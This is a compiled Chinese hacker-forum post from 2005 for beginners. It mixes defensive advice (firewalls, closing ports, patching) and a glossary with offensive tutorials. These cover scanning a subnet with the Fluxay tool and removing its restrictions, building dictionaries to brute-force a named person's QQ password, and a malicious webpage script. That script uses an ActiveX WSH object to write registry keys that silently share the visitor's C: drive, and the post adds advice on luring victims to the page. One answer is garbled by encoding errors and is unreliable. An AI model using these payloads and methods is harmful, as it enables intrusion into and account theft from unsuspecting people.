况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还 没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏 洞扫描器都是运行在 Windows9X 下的,如果是 Win2000 或者 NT 也有可能造成扫描器无法 正常工作。 7、下载回来的扫描器里面怎么没有可执行文件? 扫描器不一定非要是可执行的 exe 文件,其他例如 perl、cgi 脚本语言也可以编写扫描器, 因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络 上的其它系统中,不需要使用者上网就能够 24 小时不停的进行大面积地址扫描,并将结果 整理、分析,最后通过 Email 发送到指定的电子信箱中,因此这是一种比较高级的扫描器, 初学者不适合使用。 另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是 tar 为扩展名,那么这个扫 描器是运行在 Linux 系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格 式也和 FAT32 不一样。 8、扫描器只报告漏洞名称,不报告具体文件怎么办? 只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范 围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找, 并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国 “绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。 =========================================================== 如何防范黑客 黑客对服务器进行扫描是轻而易举的,一旦找到了服务器存在的问题,那么后果将是严重的。 这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描,本节我将谈谈如 何才能让自己的服务器免遭黑客扫描。 一、防范黑客心得体会: 100 1、屏蔽可以 IP 地址: 这种方式见效最快,一旦网络管理员发现了可疑的 IP 地址申请,可以通过防火墙屏蔽相对 应的 IP 地址,这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点,例如很多 黑客都使用的动态 IP,也就是说他们的 IP 地址会变化,一个地址被屏蔽,只要更换其他 IP 仍然可以进攻服务器,而且高级黑客有可能会伪造 IP 地址,屏蔽的也许是正常用户的地址。 2、过滤信息包: 通过编写防火墙规则,可以让系统知道什么样的信息包可以进入、什么样的应该放弃,如此 一来,当黑客发送有攻击性信息包的时候,在经过防火墙时,信息就会被丢弃掉,从而防止 了黑客的进攻。但是这种做法仍然有它不足的地方,例如黑客可以改变攻击性代码的形态, 让防火墙分辨不出信息包的真假;或者黑客干脆无休止的、大量的发送信息包,知道服务器 不堪重负而造成系统崩溃。 3、修改系统协议: 对于漏洞扫描,系统管理员可以修改服务器的相应协议,例如漏洞扫描是根据对文件的申请 返回值对文件存在进行判断的,这个数值如果是 200 则表示文件存在于服务器上,如果是 404 则表明服务器没有找到相应的文件,但是管理员如果修改了返回数值、或者屏蔽 404 数 值,那么漏洞扫描器就毫无用处了。 4、经常升级系统版本: 任何一个版本的系统发布之后,在短时间内都不会受到攻击,一旦其中的问题暴露出来,黑 客就会蜂拥而致。因此管理员在维护系统的时候,可以经常浏览著名的安全站点,找到系统 的新版本或者补丁程序进行安装,这样就可以保证系统中的漏洞在没有被黑客发现之前,就 已经修补上了,从而保证了服务器的安全。 5、及时备份重要数据: 亡羊补牢,如果数据备份及时,即便系统遭到黑客进攻,也可以在短时间内修复,挽回不必 要的经济损失。想国外很多商务网站,都会在每天晚上对系统数据进行备份,在第二天清晨, 无论系统是否收到攻击,都会重新恢复数据,保证每天系统中的数据库都不会出现损坏。数 据的备份最好放在其他电脑或者驱动器上,这样黑客进入服务器之后,破坏的数据只是一部 分,因为无法找到数据的备份,对于服务器的损失也不会太严重。 然而一旦受到黑客攻击,管理员不要只设法恢复损坏的数据,还要及时分析黑客的来源和攻 击方法,尽快修补被黑客利用的漏洞,然后检查系统中是否被黑客安装了木马、蠕虫或者被 黑客开放了某些管理员账号,尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净, 防止黑客的下一次攻击。 6、使用加密机制传输数据: 101 对于个人信用卡、密码等重要数据,在客户端与服务器之间的传送,应该仙经过加密处理在 进行发送,这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制,都 已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如 DES 加密方 法,这是一套没有逆向破解的加密算法,因此黑客的到了这种加密处理后的文件时,只能采 取暴力破解法。个人用户只要选择了一个优秀的密码,那么黑客的破解工作将会在无休止的 尝试后终止。 二、防火墙使用说明: 1.什么是防火墙? 防火墙的英文叫做 firewall,它能够在网络与电脑之间建立一道监控屏障,保护在防火墙内 部的系统不受网络黑客的攻击。逻辑上讲,防火墙既是信息分离器、限制器,也是信息分析 器,它可以有效地对局域网和 Internet 之间的任何活动进行监控,从而保证局域网内部的安 全。 网络上最著名的软件防火墙是 LockDown2000,这套软件需要经过注册才能获得完整版本, 它的功能强大,小到保护个人上网用户、大到维护商务网站的运作,它都能出色的做出惊人 的表现。但因为软件的注册需要一定费用,所以对个人用户来说还是选择一款免费的防火墙 更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人 电脑使用的网络安全程序,它能够抵挡网络入侵和攻击,防止信息泄露。 2、天网防火墙的基本功能: 天网防火墙个人版把网络分为本地网和互联网,可以针对来自不同网络的信息,来设置不同 的安全方案,以下所述的问题都是针对互联网而言的,故所有的设置都是在互联网安全级别 中完成的。 怎样防止信息泄露? 如果把文件共享向互联网开放,而且又不设定密码,那么 别人就可以轻松的通过互联网看到您机器中的文件,如果您还允许共享可写,那别人甚至可 以删除文件。 你可以在个人防火墙的互联网安全级别设置中,将 NETBIOS 关闭,这样别 人就不能通过 INTERNET 访问你的共享资源了(这种设置不会影响你在局域网中的资源共 享 )。 当拨号用户上网获得了分配到的 IP 地址之后,可以通过天网防火墙将 ICMP 关闭,这样黑 客用 PING 的方法就无法确定使用者的的系统是否处于上网状态,无法直接通过 IP 地址获 得使用者系统的信息了。 需要指出的是:防火墙拦截的信息并不完全是攻击信息,它记录的只是系统在安全设置中所 拒绝接收的数据包。在某些情况下,系统可能会收到一些正常但又被拦截的数据包,例如某 些路由器会定时发出一些 IGMP 包等;或有些主机会定时 PING 出数据到本地系统确认连接 仍在维持着,这个时候如果利用防火墙将 ICMP 和 IGMP 屏蔽了,就会在安全记录中见到这 些被拦截的数据包,因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。 3、使用防火墙的益处: 102 使用防火墙可以保护脆弱的服务,通过过滤不安全的服务,Firewall 可以极大地提高网络安 全和减少子网中主机的风险。例如,Firewall 可以禁止 NIS、NFS 服务通过,同时可以拒绝 源路由和 ICMP 重定向封包。 另外防火墙可以控制对系统的访问权限,例如某些企业允许从外部访问企业内部的某些系 统,而禁止访问另外的系统,通过防火墙对这些允许共享的系统进行设置,还可以设定内部 的系统只访问外部特定的 Mail Server 和 Web Server,保护企业内部信息的安全。 4、防火墙的种类: 防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型: (1)数据包过滤 数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择,选择的依据是系统内设置的 过滤逻辑,被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地 址、目的地址、所用的端口号、协议状态等因素,或它们的组合来确定是否允许该数据包通 过。 数据包过滤防火墙逻辑简单,价格便宜,易于安装和使用,网络性能和透明性好,它 通常安装在路由器上。路由器是内部网络与 Internet 连接必不可少的设备,因此在原有网络 上增加这样的防火墙几乎不需要任何额外的费用。 数据包过滤防火墙的缺点有二:一是非法访问一旦突破防火墙,即可对主机上的软件和配置 漏洞进行攻击;二是数据包的源地址、目的地址以及 IP 的端口号都在数据包的头部,很有 可能被窃听或假冒。 (2)应用级网关 应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针 对特定的网络应用服务协议使用指定的数据过滤逻辑,并在过滤的同时,对数据包进行必要 的分析、登记和统计,形成报告。实际中的应用网关通常安装在专用工作站系统上。 数据包过滤和应用网关防火墙有一个共同的特点,就是它们仅仅依*特定的逻辑判定是否允 许数据包通过。一旦满足逻辑,则防火墙内外的计算机系统建立直接联系,防火墙外部的用 户便有可能直接了解防火墙内部的网络结构和运行状态,这有利于实施非法访问和攻击。 (3)代理服务 代理服务(Proxy Service)也称链路级网关或 TCP 通道(Circuit Level Gateways or TCP Tunnels),也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺 点而引入的防火墙技术,其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外 计算机系统间应用层的" 链接",由两个终止代理服务器上的" 链接"来实现,外部计算机的 网络链路只能到达代理服务器,从而起到了隔离防火墙内外计算机系统的作用。此外,代理 服务也对过往的数据包进行分析、注册登记,形成报告,同时当发现被攻击迹象时会向网络 103 管理员发出警报,并保留攻击痕迹 ========================================================= 黑客之“名词介绍” 1.肉鸡,或者留了后门,可以被我们远程操控的机器,现在许多人把有 WEBSHELL 权限的 机器也叫肉鸡。 2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,战争是特络伊故意留下了个 木马,多方以为是战利品,带回城后,木马里面全是战士,这种东西,就叫做木马,可以说 木马就是一方给肉鸡留下的东西,可以做到远程控制的目的,木马还分不同的作用,有盗号 专用的木马,有远程控制专用的木马,下面介绍点:盗号专用的有许多,盗 QQ 的有 啊拉 QQ 大盗,强强盗 QQ,传奇木马生成器,魔兽木马生成器等;远程控制的木马有:冰河(国 人的骄傲,中国第一款木马),灰鸽子,PCshare,网络神偷,FLUX 等,现在通过线程插入 技术的木马也有很多,大家自己找找吧。 3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播 性,隐秘性,潜伏性。 4、后门:这个就是入侵后为方便我们下次进入肉鸡方便点所留下的东西,亲切的称为后门, 现在好点的后门有 REDMAIN 等。 5、CRACK:这个名词很容易和 HACK 混淆,但是许多人不理解 CRACK 这个东西,但是 接触过软件破解的人一定了解这个词 CRACKER 分析下就是软件破解者的意思(注意这里 有多了个 ER),许多共享软件就是我们的 CRACKER 来完成破解的,就是现在俗称的 XX 软 件破解版。 6、漏洞:这个名词相信也不用太多的介绍,根据字面意思也可以理解,就好象一个房子, 门很结实,可是有个窗户却不好,这就很可能造成被别人进入,入侵是也是相对的,必须要 有漏洞才可以入侵,这里顺便介绍下打补丁的意思,还是用上面的例子门很结实,可窗户不 好,这里我们需要把窗户补上,就叫打补丁了,许多人问过我怎样知道自己的机器有漏洞? 怎样打补丁?这里也回答下,首先介绍怎样检查自己奇迹有什么样的漏洞,有款工具简称为 MBSA 是微软公司针对 windows 系统的安全检测工具,大家可以去网上找到自己下下来检 测下自己机器有什么样的漏洞,还介绍下微软的漏洞名称 MS05-001 MS05-002 这种形式的 前面 MS 应为是微软的意思吧,05 呢是 2005 年,001 是在 2005 年第一个漏洞(不知道解释 的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞检测功能,还可以帮你 补上相应的补丁,那么怎么打补丁呢?其实这个很简单,在微软的官方网站里可以输入 MS05-001(如果你有这个漏洞的话)微软就找出了响应的补丁,下载下来 安装下其实就可以 了,呵呵,打补丁也不是什么困难的事情哦。 7、端口:这个是入侵是很重要的一个环节,端口这个东西就好象是我要买东西,需要在 1 号窗口来结帐,而开放的 1 号窗口就好比响应的端口,端口可以形象的比喻成窗口,呵呵, 104 不同的端口开放了不同的服务,大家可以在网上找到端口对照表来看下不同的端口开放的是 什么服务。 8、权限:这个东西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的 范围,比如法律可以控制人的生命,这种最高权限呢就是计算机中的 Admin 权限 最高权限, 法官呢是执行法律的人,比法律底点,这个呢就是 SYSTEM 权限,系统权限,以下每种人 有着自己不同的权限,比如我们得到了个 WEBSHELL 权限,许多人不知道这个是什么权限, 其实就是个 WEB(网业)的管理权限,权限一般比较低,但是有时想得到个服务器的 ADMIN 权限,就可以先丛 WEBSHELL 权限来入手,也就是长说的提权。 ================================================== 黑客利器流光使用技巧 流光这款软件除了能够像 X-Scan 那样扫描众多 漏洞、弱口令外,还集成了常用的入侵工具, 如字典工具、NT/IIS 工具等,还独创了能够控制“肉鸡”进行扫描的“流光 Sensor 工具” 和为“肉鸡”安装服务的“种植者”工具。 [img]http://cimg.163.com/catchpic/0/01/017362E7E9CD9FEFEA3E63510AD2FAA9.jpg');" onload='if(this.width>screen.width-460)this.width=screen.width-460'> 与 X-Scan 相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于强大,而 且功能还在不断扩充中,因此流光的作者小榕限制了流光所能扫描的 IP 范围,不允许流光 扫描国内 IP 地址,而且流光测试版在功能上也有一定的限制。但是,入侵者为了能够最大 限度地使用流光,在使用流光之前,都需要用专门的破解程序对流光进行破解,去除 IP 范 围和功能上的限制。 安装与打补丁完成后,打开流光,界面如图所示。 实例:使用流光高级扫描功能检测 210.□.□.2 到 210.□.□.253 网段主机的系统缺陷 步骤一:打开高级扫描向导、设置扫描参数。 在流光 4.7 主界面下,通过选择“文件(F)”→“ 高 级 扫 描 向 导( W)” 或 使 用快捷健“Ctrl+W” 打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束 IP 地址;在“目标系统”中选择预检测的操作系统类型;在“获取主机名”、“PING 检查” 前面打钩;在“检测项目”中,选择“全选”;选好后如图所示。[morningsky] 105 然后单击“下一步(N)”按钮,在图中选中“标准端口扫描”。 说明: “标准端口扫描”:只对常见的端口进行扫描。 “自定端口扫描范围”:自定义端口范围进行扫描。 然后单击“下一步(N)”按钮,在图中进行设置。 设置好所有检测项目后,然后单击“下一步(N)”按钮来到图界面,选择“本地主机”,表 示使用本机执行扫描任务。 步骤二:开始扫描。 在图 1-69 中单击“开始(S)”按钮进行扫描。在扫描过程中,如果想要停止,通过单击最 下角的“取消”按钮来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫 太大的网段,如果因扫描时间过长而等不及,这时候再想让流光停下来是不容易的。 步骤三:查看扫描报告。 扫描结束后,流光会自动打开 HTML 格式的扫描报告,如图所示。 需要指出的是,在扫描完成后,流光不仅把扫描结果整理成报告文件,而且还把可利用的主 机列在流光界面的最下方,如图所示。 除了使用“高级扫描向导”配置高级扫描外,还可以直接选取高级扫描工具,如图所示。 106 打开“高级扫描设置”,其界面如图所示。 关于流光的使用就介绍到这里,本节中所介绍的只是流光功能的一小部分,其他一些功能会 在以后的实例中逐一介绍。流光扫描器自身的设置是比较复杂的,有很多选项可以自由设定, 因而也给使用者更大的发挥空间,可以根据网络和机器的状况来尝试改变这些设置,提高扫 描器的性能,而且流光中还有详细的 FAQ 问题解答。 [ 此贴被 cy20 在 2005-11-06 00:25 重新编辑 ] [1 楼] | 发表于:2005-11-04 05:35 PM 免费自由共享 让菜鸟在校园黑客联盟起飞 WwW.SchoolHacker.CoM cy20 级别: 优秀学生 精华: 1 发帖: 125 威望: 330 点 大洋: 6525 ¥ 贡献值: 0 点 在线时间:33(小时) 注册时间:2005-10-27 最后登陆:2006-02-27 -------------------------------------------------------------------------------- 黑客新手基础知识 16 问答 107 问:什么是网络安全? 答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意 的原因而遭到破坏、更改、泄露,系统可以连续可*正常地运行,网络服务不被中断。 问:什么是计算机病毒? 答:计算机病毒(Computer Virus)是指编制者在计算机程序中插入的破坏计算机功能或者 破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 问:什么是木马? 答:木马是一种带有恶意性质的远程控制软件。木马一般分为客户端(client)和服务器端 (server)。客户端就是本地使用的各种命令的控制台,服务器端则是要给别人运行,只有运 行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。 问:什么是防火墙?它是如何确保网络安全的? 答:使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如 可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同 网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测) 出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信 息安全的基础设施。 问:什么是后门?为什么会存在后门? 答:后门(Back Door)是指一种绕过安全性控制而获取对程序或系统访问权的方āT谌砑 目⒔锥危绦蛟背;嵩谌砑诖唇ê竺乓员憧梢孕薷某绦蛑械娜毕荨H绻竺疟黄渌酥 溃蚴窃诜⒉既砑懊挥猩境敲此统闪税踩肌? 问:什么叫入侵检测? 答:入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能 力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算 机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的 行为和遭到袭击的迹象 问:什么叫数据包监测?它有什么作用? 答:数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听” 网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算 机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的 许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就 108 允许某人截获数据并且查看它。 问:什么是 NIDS? 答:NIDS 是 Network Intrusion Detection System 的缩写,即网络入侵检测系统,主要用于检 测 Hacker 或 Cracker 通过网络进行的入侵行为。NIDS 的运行方式有两种,一种是在目标主 机上运行以监测其本身的通信信息,另一种是在一台单独的机器上运行以监测所有网络设备 的通信信息,比如 Hub、路由器。 问:什么叫 SYN 包? 答:TCP 连接的第一个包,非常小的一种数据包。SYN 攻击包括大量此类的包,由于这些 包看上去来自实际不存在的站点,因此无法有效进行处理。 问:加密技术是指什么? 答:加密技术是最常用的安全保密手段,利用技术手段把重要的数据变为乱码(加密)传送, 到达目的地后再用相同或不同的手段还原(解密)。 加密技术包括两个元素:算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字 (密钥)结合,产生不可理解的密文的步骤,密钥是用来对数据进行编码和解密的一种算法。 在安全保密中,可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。 问:什么叫蠕虫病毒? 答:蠕虫病毒(Worm)源自第一种在网络上传播的病毒。1988 年,22 岁的康奈尔大学研究 生罗伯特·莫里斯(Robert Morris)通过网络发送了一种专为攻击 UNIX 系统缺陷、名为“蠕 虫 ”( Worm)的病毒。蠕虫造成了 6000 个系统瘫痪,估计损失为 200 万到 6000 万美元。由 于这只蠕虫的诞生,在网上还专门成立了计算机应急小组(CERT)。现在蠕虫病毒家族已经 壮大到成千上万种,并且这千万种蠕虫病毒大都出自黑客之手。 问:什么是操作系统型病毒?它有什么危害? 答:这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作,具有很强的 破坏力,会导致整个系统瘫痪。而且由于感染了操作系统,这种病毒在运行时,会用自己的 程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程 序模块在操作系统中运行的地位与作用,以及病毒取代操作系统的取代方式等,对操作系统 进行破坏。同时,这种病毒对系统中文件的感染性也很强。 问:莫里斯蠕虫是指什么?它有什么特点? 答:它的编写者是美国康乃尔大学一年级研究生罗特·莫里斯。这个程序只有 99 行,利用 了 Unix 系统中的缺点,用 Finger 命令查联机用户名单,然后破译用户口令,用 Mail 系统复 制、传播本身的源程序,再编译生成代码。 最初的网络蠕虫设计目的是当网络空闲时,程序就在计算机间“游荡”而不带来任何损害。 109 当有机器负荷过重时,该程序可以从空闲计算机“借取资源”而达到网络的负载平衡。而莫 里斯蠕虫不是“借取资源”,而是“耗尽所有资源”。 问:什么是 DDoS?它会导致什么后果? 答:DDoS 也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的方法,但是发 起攻击的源是多个。通常攻击者使用下载的工具渗透无保护的主机,当获得该主机的适当的 访问权限后,攻击者在主机中安装软件的服务或进程(以下简称代理)。这些代理保持睡眠 状态,直到从它们的主控端得到指令,对指定的目标发起拒绝服务攻击。随着危害力极强的 黑客工具的广泛传播使用,分布式拒绝服务攻击可以同时对一个目标发起几千个攻击。单个 的拒绝服务攻击的威力也许对带宽较宽的站点没有影响,而分布于全球的几千个攻击将会产 生致命的后果。 问:局域网内部的 ARP 攻击是指什么? 答:ARP 协议的基本功能就是通过目标设备的 IP 地址,查询目标设备的 MAC 地址,以保 证通信的进行。 基于 ARP 协议的这一工作特性,黑客向对方计算机不断发送有欺诈性质的 ARP 数据包,数 据包内包含有与当前设备重复的 Mac 地址,使对方在回应报文时,由于简单的地址重复错 误而导致不能进行正常的网络通信。一般情况下,受到 ARP 攻击的计算机会出现两种现象: 1.不断弹出“本机的 XXX 段硬件地址与网络中的 XXX 段地址冲突”的对话框。 2.计算机不能正常上网,出现网络中断的症状。 因为这种攻击是利用 ARP 请求报文进行“欺骗”的,所以防火墙会误以为是正常的请求数 据包,不予拦截。因此普通的防火墙很难抵挡这种攻击。 问:什么叫欺骗攻击?它有哪些攻击方式? 答:网络欺骗的技术主要有:HONEYPOT 和分布式 HONEYPOT、欺骗空间技术等。主要方 式有:IP 欺骗、ARP 欺骗、DNS 欺骗、Web 欺骗、电子邮件欺骗、源路由欺骗(通过指定路 由,以假冒身份与其他主机进行合法通信或发送假报文,使受攻击主机出现错误动作)、地 址欺骗(包括伪造源地址和伪造中间站点)等。 ======================================================== 菜鸟黑客入门攻击及防范技巧 在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方 的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基 本的网络信息——对方的 IP 地址;以及用户如何防范自己的 IP 泄漏。 ■ 获取 IP “IP”作为 Net 用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不 同的网络情况采取不同的方法,如:在局域网内使用 Ping 指令,Ping 对方在网络中的名称 而获得 IP;在 Internet 上使用 IP 版的 QQ 直接显示。而最“牛”,也是最有效的办法是截获 110 并分析对方的网络数据包。如图 1 所示,这是用 Windows 2003 的网络监视器捕获的网络数 据包,可能一般的用户比较难看懂这些 16 进制的代码,而对于了解网络知识的黑客,他们 可以找到并直接通过软件解析截获后的数据包的 IP 包头信息,再根据这些信息了解具体的 IP。 ■ 隐藏 IP 虽然侦察 IP 的方法多样,但用户可以隐藏 IP 的方法同样多样。就拿对付最有效的“数据包 分析方法”而言,就可以安装能够自动去掉发送数据包包头 IP 信 息 的“ Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗费资源严重,降低计算 机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。现在的个人用户 采用最普及隐藏 IP 的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送 出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户 IP 的网络软 件(QQ、MSN、IE 等)都支持使用代理方式连接 Internet,特别是 QQ 使用“ezProxy”等 代理软件连接后,IP 版的 QQ 都无法显示该 IP 地址。这里笔者介绍一款比较适合个人用户 的简易代理软件——网络新手 IP 隐藏器(如图 2),只要在“代理服务器”和“代理服务器 端”填入正确的代理服务器地址和端口,即可对 http 使用代理,比较适合由于 IE 和 QQ 泄 漏 IP 的情况。 不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能 够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理 服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。 虽然代理可以有效地隐藏用户 IP,但高深的黑客亦可以绕过代理,查找到对方的真实 IP 地 址,用户在何种情况下使用何种方法隐藏 IP,也要因情况而论。 黑客的探测方式里除了侦察 IP,还有一项——端口扫描。通过“端口扫描”可以知道被扫 描的计算机哪些服务、端口是打开而没有被使用的(可以理解为寻找通往计算机的通道)。 一、端口扫描 网上很容易找到远程端口扫描的工具,如 Superscan、IP Scanner、Fluxay(流光)等(如图 1), 这就是用“流光”对试验主机 192.168.1.8 进行端口扫描后的结果。从中我们可以清楚地了 解,该主机的哪些非常用端口是打开的;是否支持 FTP、Web 服务;且 FTP 服务是否支持 “匿名”,以及 IIS 版本,是否有可以被成功攻破的 IIS 漏洞也显示出来。 二、阻止端口扫描 防范端口扫描的方法有两个: 111 1. 关闭闲置和有潜在危险的端口 这个方法有些“死板”,它的本质是——将所有用户需要用到的正常计算机端口外的其他端 口都关闭掉。因为就黑客而言,所有的端口都可能成为攻击的目标。换句话说“计算机的所 有对外通讯的端口都存在潜在的危险”,而一些系统必要的通讯端口,如访问网页需要的 HTTP(80 端 口 ); QQ(4000 端口)等不能被关闭。 在 Windows NT 核心系统(Windows 2000/XP/ 2003)中要关闭掉一些闲置端口是比较方便的, 可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些网络服 务会有系统分配默认的端口,将一些闲置的服务关闭掉,其对应的端口也会被关闭了(如图 2)。进入“控制面板”、“管理工具”、“服务”项内,关闭掉计算机的一些没有使用的服务(如 FTP 服务、DNS 服务、IIS Admin 服务等等),它们对应的端口也被停用了。至于“只开放 允许端口的方式”,可以利用系统的“TCP/IP 筛选”功能实现,设置的时候,“只允许”系 统的一些基本网络通讯需要的端口即可(关于“TCP/IP 的筛选”,请参看本期应用专题)。 2. 检查各端口,有端口扫描的症状时,立即屏蔽该端口 这种预防端口扫描的方式显然用户自己手工是不可能完成的,或者说完成起来相当困难,需 要借助软件。这些软件就是我们常用的网络防火墙。 防火墙的工作原理是:首先检查每个到达你的电脑的数据包,在这个包被你机上运行的任何 软件看到之前,防火墙有完全的否决权,可以禁止你的电脑接收 Internet 上的任何东西。当 第一个请求建立连接的包被你的电脑回应后,一个“TCP/IP 端口”被打开;端口扫描时, 对方计算机不断和本地计算机建立连接,并逐渐打开各个服务所对应的“TCP/IP 端口”及 闲置端口,防火墙经过自带的拦截规则判断,就能够知道对方是否正进行端口扫描,并拦截 掉对方发送过来的所有扫描需要的数据包。 现在市面上几乎所有网络防火墙都能够抵御端口扫描,在默认安装后,应该检查一些防火墙 所拦截的端口扫描规则是否被选中,否则它会放行端口扫描,而只是在日志中留下信息而已。 黑客在进行攻击前的准备工作,就此介绍完毕。在以后的内容中,将转入正式的入侵、窃取 和攻击等具体的介绍。 上网了吧,用 Q 了吧,被盗了吧,正常。想上网吧,想用 Q 吧,不想被盗 Q 吧,正常。那 就来了解一些盗 QQ 方面的知识吧! 一、名词解释 1.字典 所谓字典,其实就是一个包含有许多密码的文本文件。字典的生成有两种方式:用字典软件 生成和手动添加。一般字典软件能生成包含生日、电话号码、常用英文名等密码的字典,不 112 过由于这样生成的字典体积大,而且不灵活,所以黑客往往会手动添加一些密码到字典里去, 形成一个“智能化”的密码文件。 2.暴力破解 所谓暴力破解,其实就是用无数的密码来与登录 QQ 的密码进行核对,直到相同为止。暴力 破解这种方法不仅可以运用在盗 QQ 上,在破解其它密码时也常用这种方法,如:破解系统 管理员密码等。这是最常用的一种破解方式。 二、原理分析 现在盗 QQ 的软件有两种,本地破解和远程破解。看起来好像挺神秘的,其实说穿了就那么 回事。下面咱们先来看看本地破解。 1.本地破解 本地破解其实就是用软件选择一个在本地登录过的 QQ 号码,然后挂上字典进行密码核对。 本地破解也可分为两种:暴力破解和本地记录。而暴力破解又分为两种:按顺序增加和通过 字典对比。比如现在我要破解 QQ 号为 123456 的密码,我可以用 1 作为密码进行核对,如 果正确就可以盗走该号了,如果不正确,则用 2 来核对,还不正确,则用 3,以此顺序增加, 直到和密码相同为止。不过这样的破解效率是很低的,因为许多人的密码并不只是数字,所 以这种方法并不常见。 平时常用的是通过对比字典中密码的方法,如果正确就盗走 QQ。因为字典可以做得很“智 能化”,所以这种破解效率相对较高,特别是当你的密码是简单的数字,或是数字加一些英 文名时特别明显。举个例子,比如我在网吧看到一 MM 的英文名为 alice,密码位数为 8 位 (我怎么知道的?晕!偷看到的嘛!)。从常理来讲,一般她的密码就是 alice 加上一些数字。 于是我可以用易优超级字典生成器制作这样一个字典:把 alice 做为特殊字符排在密码的第 1-5 位(如图 1),然后把基本字符里的数字全部选上,再将密码位数设为 8,然后选好保存 位置点“生成字典”。 图 1 打开生成的字典,你就可以看到 alice000、alice001 等密码了(如图 2)。然后就是把 alice 放在第 2-6 位,第 3-7 位,第 4-8 位,其它位置同样用数字填满。接下来我只要用软件把这 些字典挂上进行破解,很快就可以得到 QQ 密码了。 =============================================== 黑客通过网页窃取 QQ 方法 113 要想偷别人的 QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。 方法是:在你的网站网页中加入如下内容的代码: ------------------------------------------------------------------------ <script language=Java Script> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent ></APPLET>"); function f() {*********************]; al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); al.createlnstance() Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Flafgs",302,"REG_DWORD"); Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Type",0,"REG_DWORD"); Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RW C$//Path","C://");} function init() {setTimeout("f()",1000);} {********************} init() </script> ------------------------------------- 上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的 C 盘共享出来,如果想让对方的其他盘都共享请自行设置。 述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表 Windows Scripting Host(WSH) 的外壳对象。WSH 是微软提供的一种基于 32 位 Windows 平台的、与语言无关的脚本解释 机制,它使得脚本能够直接在 Windows 桌面或命令提示符下运行。WSH 使得脚本可以被执 行,就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注 册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为 00000302 可以隐藏共享, 使对方无法发现,非常隐蔽。 网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果 对方的 IE 